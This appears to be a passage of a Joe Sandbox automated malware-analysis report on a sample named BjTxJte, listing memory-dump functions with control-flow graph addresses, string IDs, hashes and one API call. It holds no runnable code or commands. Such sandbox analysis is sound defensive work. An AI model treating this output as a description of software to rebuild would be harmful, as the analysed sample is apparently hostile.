                                                                                      control_flow_graph 130 6823480-68234a1 131 68234a3-68234a6 130->131 132 6823c47-6823c4a 131->132 133 68234ac-68234cb 131->133 134 6823c70-6823c72 132->134 135 6823c4c-6823c6b 132->135 142 68234e4-68234ee 133->142 143 68234cd-68234d0 133->143 137 6823c74 134->137 138 6823c79-6823c7c 134->138 135->134 137->138 138->131 140 6823c82-6823c8b 138->140 148 68234f4-6823503 142->148 143->142 145 68234d2-68234e2 143->145 145->148 257 6823505 call 6823ca0 148->257 258 6823505 call 6823c98 148->258 149 682350a-682350f 150 6823511-6823517 149->150 151 682351c-68237f9 149->151 150->140 172 6823c39-6823c46 151->172 173 68237ff-68238ae 151->173 182 68238b0-68238d5 173->182 183 68238d7 173->183 184 68238e0-68238f3 182->184 183->184 187 6823c20-6823c2c 184->187 188 68238f9-682391b 184->188 187->173 189 6823c32 187->189 188->187 191 6823921-682392b 188->191 189->172 191->187 192 6823931-682393c 191->192 192->187 193 6823942-6823a18 192->193 205 6823a26-6823a56 193->205 206 6823a1a-6823a1c 193->206 210 6823a64-6823a70 205->210 211 6823a58-6823a5a 205->211 206->205 212 6823a72-6823a76 210->212 213 6823ad0-6823ad4 210->213 211->210 212->213 216 6823a78-6823aa2 212->216 214 6823c11-6823c1a 213->214 215 6823ada-6823b16 213->215 214->187 214->193 227 6823b24-6823b32 215->227 228 6823b18-6823b1a 215->228 223 6823ab0-6823acd call 682306c 216->223 224 6823aa4-6823aa6 216->224 223->213 224->223 231 6823b34-6823b3f 227->231 232 6823b49-6823b54 227->232 228->227 231->232 235 6823b41 231->235 236 6823b56-6823b5c 232->236 237 6823b6c-6823b7d 232->237 235->232 238 6823b60-6823b62 236->238 239 6823b5e 236->239 241 6823b95-6823ba1 237->241 242 6823b7f-6823b85 237->242 238->237 239->237 246 6823ba3-6823ba9 241->246 247 6823bb9-6823c0a 241->247 243 6823b87 242->243 244 6823b89-6823b8b 242->244 243->241 244->241 248 6823bab 246->248 249 6823bad-6823baf 246->249 247->214 248->247 249->247 257->149 258->149
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: c5614cc86c01a8abe0af70650b0c5d2d5e19f2fdfeb975ca973bb48e155e5264
                                                                                      • Instruction ID: 2a53e3d2dae05d143f3ad6293db72d18ac81701cc0d1a7d5935121f5a6c39790
                                                                                      • Opcode Fuzzy Hash: c5614cc86c01a8abe0af70650b0c5d2d5e19f2fdfeb975ca973bb48e155e5264
                                                                                      • Instruction Fuzzy Hash: 46321E31E1071ACFCB15EF75D89459DF7B6BF89300F1086AAD409AB264EB30A9C5CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06827D90 Relevance: 3.0, Strings: 2, Instructions: 477COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 639 6827d90-6827dae 642 6827db0-6827db3 639->642 643 6827dd6-6827dd9 642->643 644 6827db5-6827dd1 642->644 647 6827de6-6827de9 643->647 648 6827dda-6827de5 643->648 644->643 649 6827e00-6827e03 647->649 650 6827deb-6827df9 647->650 651 6827e24-6827e26 649->651 652 6827e05-6827e1f 649->652 657 6827e36-6827e4c 650->657 658 6827dfb 650->658 654 6827e28 651->654 655 6827e2d-6827e30 651->655 652->651 654->655 655->642 655->657 662 6827e52-6827e5b 657->662 663 6828067-6828071 657->663 658->649 664 6828072-682807a 662->664 665 6827e61-6827e7e 662->665 668 6828082 664->668 669 682807c-682807e 664->669 675 6828054-6828061 665->675 676 6827e84-6827eac 665->676 673 6828084-6828085 668->673 674 682808a-682808d 668->674 671 6828080 669->671 672 6828086 669->672 671->668 677 6828088-6828089 672->677 678 682808e-68280a7 672->678 673->672 674->678 675->662 675->663 676->675 691 6827eb2-6827ebb 676->691 677->674 679 68280a9-68280ac 678->679 681 68280b2-68280c1 679->681 682 68282d8-68282db 679->682 689 68280c3-68280de 681->689 690 68280e0-682811b 681->690 683 6828392-6828395 682->683 684 68282e1-68282ed 682->684 686 6828397-68283b3 683->686 687 68283b8-68283ba 683->687 692 68282f8-68282fa 684->692 686->687 693 68283c1-68283c4 687->693 694 68283bc 687->694 689->690 707 6828121-6828132 690->707 708 68282ac-68282c2 690->708 691->664 696 6827ec1-6827edd 691->696 697 6828312-6828319 692->697 698 68282fc-6828302 692->698 693->679 699 68283ca-68283d3 693->699 694->693 715 6828042-682804e 696->715 716 6827ee3-6827f0d 696->716 704 682832a 697->704 705 682831b-6828328 697->705 702 6828306-6828308 698->702 703 6828304 698->703 702->697 703->697 706 682832f-6828331 704->706 705->706 711 6828333-6828336 706->711 712 6828348-6828381 706->712 720 6828297-68282a6 707->720 721 6828138-6828155 707->721 708->682 711->699 712->681 734 6828387-6828391 712->734 715->675 715->691 731 6827f13-6827f3b 716->731 732 6828038-682803d 716->732 720->707 720->708 721->720 730 682815b-6828251 call 68265b8 721->730 783 6828253-682825d 730->783 784 682825f 730->784 731->732 740 6827f41-6827f6f 731->740 732->715 740->732 746 6827f75-6827f7e 740->746 746->732 747 6827f84-6827fb6 746->747 755 6827fc1-6827fdd 747->755 756 6827fb8-6827fbc 747->756 755->715 758 6827fdf-6828036 call 68265b8 755->758 756->732 757 6827fbe 756->757 757->755 758->715 785 6828264-6828266 783->785 784->785 785->720 786 6828268-682826d 785->786 787 682827b 786->787 788 682826f-6828279 786->788 789 6828280-6828282 787->789 788->789 789->720 790 6828284-6828290 789->790 790->720
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 2242b878b4ab25a3c2314b3e3b63d8c8373ec3ce817065dadd76852828c7418d
                                                                                      • Instruction ID: ed83d43de82c8662f3b0ac94caa8b2e34f9ca9a7e6fcaaac2bc669b215418c32
                                                                                      • Opcode Fuzzy Hash: 2242b878b4ab25a3c2314b3e3b63d8c8373ec3ce817065dadd76852828c7418d
                                                                                      • Instruction Fuzzy Hash: 1C02AC71B0022A9FDF54EB64D490AAEB7E2FF88304F148529D505DB394DB31EC8ACB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068255C0 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $
                                                                                      • API String ID: 0-3993045852
                                                                                      • Opcode ID: a90fa56207c26b8062acbe26e08bb943de70efea7d48a4c6c95b5b87f6bfd1ac
                                                                                      • Instruction ID: e55bd259cfa9f63c3bbb2385918903fc17f0ba90155b934d17cd65a9cc2ea54b
                                                                                      • Opcode Fuzzy Hash: a90fa56207c26b8062acbe26e08bb943de70efea7d48a4c6c95b5b87f6bfd1ac
                                                                                      • Instruction Fuzzy Hash: 5322E571E402268FDF64DFA4C4946AEB7B2EF84324F208469D559EB344DB31DC85CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06826608 Relevance: .8, Instructions: 826COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 79ac53b1d21d2803ad022f4290258735a2cca991898aaad4580238e31a4a0bc5
                                                                                      • Instruction ID: 65bdf5563d805aa0cd675c08ca9485948cb6bdfe94c7af1034bda15da6a5d3d8
                                                                                      • Opcode Fuzzy Hash: 79ac53b1d21d2803ad022f4290258735a2cca991898aaad4580238e31a4a0bc5
                                                                                      • Instruction Fuzzy Hash: 7D62BF34A0021A9FDF54EB68D590AADB7F2EF84314F148469E506DB394EB35ECC6CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682C1B0 Relevance: .7, Instructions: 651COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 19fab2f22dd0a284c8f16a8d8da21da5d27d2bccb65329d670484d983d5b9964
                                                                                      • Instruction ID: 4f6c074b57c728fbc168f41cc2f2c71ec928d781cd0e5ca3dbe794369f129218
                                                                                      • Opcode Fuzzy Hash: 19fab2f22dd0a284c8f16a8d8da21da5d27d2bccb65329d670484d983d5b9964
                                                                                      • Instruction Fuzzy Hash: C3329071B1021A8FDF94DB68D990ABEB7B2FB88310F108529D505EB355DB35EC82CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682B32E Relevance: .6, Instructions: 560COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9594b62b764782742548de3ddc37f8d34698dcae63daa97fed38c7e877b866e
                                                                                      • Instruction ID: aa7d33526513c2d92c1509b615650b03ac6ab4398cc42001115a00f780d0e928
                                                                                      • Opcode Fuzzy Hash: e9594b62b764782742548de3ddc37f8d34698dcae63daa97fed38c7e877b866e
                                                                                      • Instruction Fuzzy Hash: 85226F70E1121A8FDF64DB68D5807ADB7F2EB89318F208826E509EB395DA35DCC1CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682ACE8 Relevance: 10.4, Strings: 8, Instructions: 394COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 682ace8-682ad06 1 682ad08-682ad0b 0->1 2 682ad1b-682ad1e 1->2 3 682ad0d-682ad16 1->3 4 682ad20-682ad3c 2->4 5 682ad41-682ad44 2->5 3->2 4->5 6 682ad46-682ad4a 5->6 7 682ad55-682ad58 5->7 8 682ad50 6->8 9 682af14-682af1e 6->9 10 682ad72-682ad75 7->10 11 682ad59-682ad6d 7->11 8->7 13 682ad77-682ad80 10->13 14 682ad8f-682ad92 10->14 11->10 16 682ad86-682ad8a 13->16 17 682af1f-682af2a 13->17 18 682ad94-682ad99 14->18 19 682ad9c-682ad9f 14->19 16->14 28 682af32 17->28 29 682af2c-682af30 17->29 18->19 21 682af05-682af0e 19->21 22 682ada5-682ada8 19->22 21->9 21->13 24 682adaa-682adb7 22->24 25 682adbc-682adbe 22->25 24->25 26 682adc0 25->26 27 682adc5-682adc8 25->27 26->27 27->1 30 682adce-682adf2 27->30 31 682af34-682af36 28->31 32 682af3a-682af3d 28->32 29->28 44 682af02 30->44 45 682adf8-682ae07 30->45 34 682af38-682af39 31->34 35 682af3e-682af56 31->35 32->35 34->32 37 682af58-682af5b 35->37 38 682af61-682af9c 37->38 39 682b1c4-682b1c7 37->39 48 682afa2-682afae 38->48 49 682b18f-682b1a2 38->49 41 682b1d6-682b1d9 39->41 42 682b1c9 call 682b32e 39->42 46 682b1ea-682b1ed 41->46 47 682b1db-682b1df 41->47 50 682b1cf-682b1d1 42->50 44->21 62 682ae09-682ae0f 45->62 63 682ae1f-682ae5a call 68265b8 45->63 52 682b210-682b213 46->52 53 682b1ef-682b20b 46->53 47->38 51 682b1e5 47->51 64 682afb0-682afc9 48->64 65 682afce-682b012 48->65 54 682b1a4 49->54 50->41 51->46 55 682b220-682b222 52->55 56 682b215-682b21f 52->56 53->52 54->39 60 682b224 55->60 61 682b229-682b22c 55->61 60->61 61->37 66 682b232-682b23c 61->66 67 682ae13-682ae15 62->67 68 682ae11 62->68 80 682ae72-682ae89 63->80 81 682ae5c-682ae62 63->81 64->54 83 682b014-682b026 65->83 84 682b02e-682b06d 65->84 67->63 68->63 95 682aea1-682aeb2 80->95 96 682ae8b-682ae91 80->96 85 682ae66-682ae68 81->85 86 682ae64 81->86 83->84 90 682b073-682b14e call 68265b8 84->90 91 682b154-682b169 84->91 85->80 86->80 90->91 91->49 102 682aeb4-682aeba 95->102 103 682aeca-682aefb 95->103 97 682ae93 96->97 98 682ae95-682ae97 96->98 97->95 98->95 105 682aebe-682aec0 102->105 106 682aebc 102->106 103->44 105->103 106->103
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-3823777903
                                                                                      • Opcode ID: 29228c934bb17e1717245433f23c198ec5bd6aaf226c5d65df3d835928db6b83
                                                                                      • Instruction ID: 388b9b355a175dbaee1041bab22af56b8c1c20916b4c35a6f04244e1b3f66862
                                                                                      • Opcode Fuzzy Hash: 29228c934bb17e1717245433f23c198ec5bd6aaf226c5d65df3d835928db6b83
                                                                                      • Instruction Fuzzy Hash: DDE15E70E1021A8FDB69DF68D8806AEB7B2FF85304F108529D505EB358DB75EC86CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06829160 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 259 6829160-6829185 262 6829187-682918a 259->262 263 6829190-68291a5 262->263 264 6829a48-6829a4b 262->264 271 68291a7-68291ad 263->271 272 68291bd-68291d3 263->272 265 6829a71-6829a73 264->265 266 6829a4d-6829a6c 264->266 268 6829a75 265->268 269 6829a7a-6829a7d 265->269 266->265 268->269 269->262 273 6829a83-6829a8d 269->273 274 68291b1-68291b3 271->274 275 68291af 271->275 278 68291de-68291e0 272->278 274->272 275->272 279 68291e2-68291e8 278->279 280 68291f8-6829269 278->280 281 68291ea 279->281 282 68291ec-68291ee 279->282 291 6829295-68292b1 280->291 292 682926b-682928e 280->292 281->280 282->280 297 68292b3-68292d6 291->297 298 68292dd-68292f8 291->298 292->291 297->298 303 6829323-682933e 298->303 304 68292fa-682931c 298->304 309 6829363-6829371 303->309 310 6829340-682935c 303->310 304->303 311 6829373-682937c 309->311 312 6829381-68293fb 309->312 310->309 311->273 318 6829448-682945d 312->318 319 68293fd-682941b 312->319 318->264 323 6829437-6829446 319->323 324 682941d-682942c 319->324 323->318 323->319 324->323
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: 5f566d9e1ab7674d71682838af711388fa7c5ae48634dc763067d66b72c16dfe
                                                                                      • Instruction ID: 605a85d35ce0ef0567c0cef12696586da6c3bb56dbb7d56217db8616f57c6978
                                                                                      • Opcode Fuzzy Hash: 5f566d9e1ab7674d71682838af711388fa7c5ae48634dc763067d66b72c16dfe
                                                                                      • Instruction Fuzzy Hash: 18915230F1021A9FDF54DB65D8907AEB7F6AFC9204F148569C409EB344EF70AC868B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682CF78 Relevance: 4.5, Strings: 3, Instructions: 796COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 327 682cf78-682cf93 329 682cf95-682cf98 327->329 330 682cfb5-682cfb8 329->330 331 682cf9a-682cfb0 329->331 332 682d001-682d004 330->332 333 682cfba-682cffc 330->333 331->330 335 682d006-682d048 332->335 336 682d04d-682d050 332->336 333->332 335->336 338 682d052-682d094 336->338 339 682d099-682d09c 336->339 338->339 342 682d0e5-682d0e8 339->342 343 682d09e-682d0ad 339->343 345 682d131-682d134 342->345 346 682d0ea-682d12c 342->346 348 682d0af-682d0b4 343->348 349 682d0bc-682d0c8 343->349 351 682d136-682d152 345->351 352 682d157-682d15a 345->352 346->345 348->349 353 682d991-682d99e 349->353 354 682d0ce-682d0e0 349->354 351->352 357 682d169-682d16c 352->357 358 682d15c-682d15e 352->358 371 682d9a0-682d9a5 353->371 372 682d9a6 353->372 354->342 365 682d172-682d175 357->365 366 682d460-682d46c 357->366 362 682d164 358->362 363 682d45d 358->363 362->357 363->366 373 682d177-682d1b9 365->373 374 682d1be-682d1c1 365->374 366->343 368 682d472-682d75f 366->368 544 682d986-682d990 368->544 545 682d765-682d76b 368->545 371->372 379 682d9a8-682d9ad 372->379 380 682d9ae-682d9c6 372->380 373->374 377 682d1c3-682d1d2 374->377 378 682d20a-682d20d 374->378 384 682d1e1-682d1ed 377->384 385 682d1d4-682d1d9 377->385 390 682d256-682d259 378->390 391 682d20f-682d251 378->391 379->380 389 682d9c8-682d9cb 380->389 384->353 392 682d1f3-682d205 384->392 385->384 395 682d9fe-682da01 389->395 396 682d9cd-682d9f9 389->396 393 682d263-682d266 390->393 394 682d25b-682d260 390->394 391->390 392->378 400 682d268-682d2aa 393->400 401 682d2af-682d2b2 393->401 394->393 404 682da03-682da1f 395->404 405 682da24-682da27 395->405 396->395 400->401 409 682d2b4-682d2f6 401->409 410 682d2fb-682d2fe 401->410 404->405 407 682da36-682da38 405->407 408 682da29 call 682dae5 405->408 416 682da3a 407->416 417 682da3f-682da42 407->417 426 682da2f-682da31 408->426 409->410 414 682d300-682d302 410->414 415 682d309-682d30b 410->415 422 682d304 414->422 423 682d31b-682d324 414->423 424 682d312-682d315 415->424 425 682d30d 415->425 416->417 417->389 428 682da44-682da53 417->428 422->415 432 682d333-682d33f 423->432 433 682d326-682d32b 423->433 424->329 424->423 425->424 426->407 444 682da55-682dab8 call 68265b8 428->444 445 682daba-682dacf 428->445 437 682d450-682d455 432->437 438 682d345-682d359 432->438 433->432 437->363 438->363 452 682d35f-682d371 438->452 444->445 462 682d373-682d379 452->462 463 682d395-682d397 452->463 464 682d37b 462->464 465 682d37d-682d389 462->465 468 682d3a1-682d3ad 463->468 469 682d38b-682d393 464->469 465->469 475 682d3bb 468->475 476 682d3af-682d3b9 468->476 469->468 477 682d3c0-682d3c2 475->477 476->477 477->363 480 682d3c8-682d3e4 call 68265b8 477->480 488 682d3f3-682d3ff 480->488 489 682d3e6-682d3eb 480->489 488->437 492 682d401-682d44e 488->492 489->488 492->363 546 682d77a-682d783 545->546 547 682d76d-682d772 545->547 546->353 548 682d789-682d79c 546->548 547->546 550 682d7a2-682d7a8 548->550 551 682d976-682d980 548->551 552 682d7b7-682d7c0 550->552 553 682d7aa-682d7af 550->553 551->544 551->545 552->353 554 682d7c6-682d7e7 552->554 553->552 557 682d7f6-682d7ff 554->557 558 682d7e9-682d7ee 554->558 557->353 559 682d805-682d822 557->559 558->557 559->551 562 682d828-682d82e 559->562 562->353 563 682d834-682d84d 562->563 565 682d853-682d87a 563->565 566 682d969-682d970 563->566 565->353 569 682d880-682d88a 565->569 566->551 566->562 569->353 570 682d890-682d8a7 569->570 572 682d8b6-682d8d1 570->572 573 682d8a9-682d8b4 570->573 572->566 578 682d8d7-682d8f0 call 68265b8 572->578 573->572 582 682d8f2-682d8f7 578->582 583 682d8ff-682d908 578->583 582->583 583->353 584 682d90e-682d962 583->584 584->566
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q
                                                                                      • API String ID: 0-831282457
                                                                                      • Opcode ID: 8196418b7b8dc82661cb39652514286f767d30f7c41a03d3594b9a611d6256b9
                                                                                      • Instruction ID: 6ee7b9b79794779dc8baa7cdb82cf529bde68eb0311b068ec2468a8bd0aaf6d1
                                                                                      • Opcode Fuzzy Hash: 8196418b7b8dc82661cb39652514286f767d30f7c41a03d3594b9a611d6256b9
                                                                                      • Instruction Fuzzy Hash: 24622E31A102168FCB55EB68D590A5EB7F2FF84304F148A69D059DF369DB71EC86CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06824B88 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 592 6824b88-6824bac 594 6824bae-6824bb1 592->594 595 6824bd2-6824bd5 594->595 596 6824bb3-6824bcd 594->596 597 68252b4-68252b6 595->597 598 6824bdb-6824cd3 595->598 596->595 600 68252b8 597->600 601 68252bd-68252c0 597->601 616 6824d56-6824d5d 598->616 617 6824cd9-6824d26 call 6825433 598->617 600->601 601->594 602 68252c6-68252d3 601->602 618 6824d63-6824dd3 616->618 619 6824de1-6824dea 616->619 630 6824d2c-6824d48 617->630 636 6824dd5 618->636 637 6824dde 618->637 619->602 633 6824d53 630->633 634 6824d4a 630->634 633->616 634->633 636->637 637->619
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq$\Ocq
                                                                                      • API String ID: 0-3575482020
                                                                                      • Opcode ID: c157ce4aac0f563ae4819dbd2622ab832c0783456a301f85cc7769e977976132
                                                                                      • Instruction ID: eab06371887f18d1950a62d81a2ac33244a8be3f0caaba706ff9a9c5605d6405
                                                                                      • Opcode Fuzzy Hash: c157ce4aac0f563ae4819dbd2622ab832c0783456a301f85cc7769e977976132
                                                                                      • Instruction Fuzzy Hash: E4618070F002199FEF549FA5C8547AEBBF2FB88710F20842AD11AEB394DB758C458B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06829151 Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1461 6829151-6829156 1462 6829158-682915a 1461->1462 1463 682915e 1461->1463 1464 6829162-6829165 1462->1464 1465 682915c-682915d 1462->1465 1466 6829160-6829161 1463->1466 1467 6829166-6829185 1463->1467 1464->1467 1465->1463 1466->1464 1468 6829187-682918a 1467->1468 1469 6829190-68291a5 1468->1469 1470 6829a48-6829a4b 1468->1470 1477 68291a7-68291ad 1469->1477 1478 68291bd-68291d3 1469->1478 1471 6829a71-6829a73 1470->1471 1472 6829a4d-6829a6c 1470->1472 1474 6829a75 1471->1474 1475 6829a7a-6829a7d 1471->1475 1472->1471 1474->1475 1475->1468 1479 6829a83-6829a8d 1475->1479 1480 68291b1-68291b3 1477->1480 1481 68291af 1477->1481 1484 68291de-68291e0 1478->1484 1480->1478 1481->1478 1485 68291e2-68291e8 1484->1485 1486 68291f8-6829269 1484->1486 1487 68291ea 1485->1487 1488 68291ec-68291ee 1485->1488 1497 6829295-68292b1 1486->1497 1498 682926b-682928e 1486->1498 1487->1486 1488->1486 1503 68292b3-68292d6 1497->1503 1504 68292dd-68292f8 1497->1504 1498->1497 1503->1504 1509 6829323-682933e 1504->1509 1510 68292fa-682931c 1504->1510 1515 6829363-6829371 1509->1515 1516 6829340-682935c 1509->1516 1510->1509 1517 6829373-682937c 1515->1517 1518 6829381-68293fb 1515->1518 1516->1515 1517->1479 1524 6829448-682945d 1518->1524 1525 68293fd-682941b 1518->1525 1524->1470 1529 6829437-6829446 1525->1529 1530 682941d-682942c 1525->1530 1529->1524 1529->1525 1530->1529
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: d23aecc5e98cad8871c1d253d509608a332c7cb625b785ab86467482dbc202c4
                                                                                      • Instruction ID: 4bb12dcb492494f9557035a642bf59c48d3d6f2813812a0b309201f8d1bf8401
                                                                                      • Opcode Fuzzy Hash: d23aecc5e98cad8871c1d253d509608a332c7cb625b785ab86467482dbc202c4
                                                                                      • Instruction Fuzzy Hash: 87516530F041169FDF54EB75D890B6EB7FAABC9644F14856AC509DB384DA30EC82CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06824B79 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1573 6824b79-6824b86 1575 6824b88-6824b8d 1573->1575 1576 6824b8e-6824bac 1573->1576 1575->1576 1577 6824bae-6824bb1 1576->1577 1578 6824bd2-6824bd5 1577->1578 1579 6824bb3-6824bcd 1577->1579 1580 68252b4-68252b6 1578->1580 1581 6824bdb-6824cd3 1578->1581 1579->1578 1583 68252b8 1580->1583 1584 68252bd-68252c0 1580->1584 1599 6824d56-6824d5d 1581->1599 1600 6824cd9-6824d26 call 6825433 1581->1600 1583->1584 1584->1577 1585 68252c6-68252d3 1584->1585 1601 6824d63-6824dd3 1599->1601 1602 6824de1-6824dea 1599->1602 1613 6824d2c-6824d48 1600->1613 1619 6824dd5 1601->1619 1620 6824dde 1601->1620 1602->1585 1616 6824d53 1613->1616 1617 6824d4a 1613->1617 1616->1599 1617->1616 1619->1620 1620->1602
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq
                                                                                      • API String ID: 0-936005338
                                                                                      • Opcode ID: 6721bf61931c4af0b2fe316ef96cfc119a6da477651af904c8e5bedb66537d9f
                                                                                      • Instruction ID: 0d6d6e774aef9af85f41879fe30bcdfe33ee813d76fa064fd67ac80e31f7cd11
                                                                                      • Opcode Fuzzy Hash: 6721bf61931c4af0b2fe316ef96cfc119a6da477651af904c8e5bedb66537d9f
                                                                                      • Instruction Fuzzy Hash: 09517D30F102199FDB559FA9C854BAEBBF7FB88710F20852AD106EB394DA758C418B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012FEFD8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1815 12fefd8-12ff054 GlobalMemoryStatusEx 1818 12ff05d-12ff085 1815->1818 1819 12ff056-12ff05c 1815->1819 1819->1818
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 012FF047
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4122198845.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_12f0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
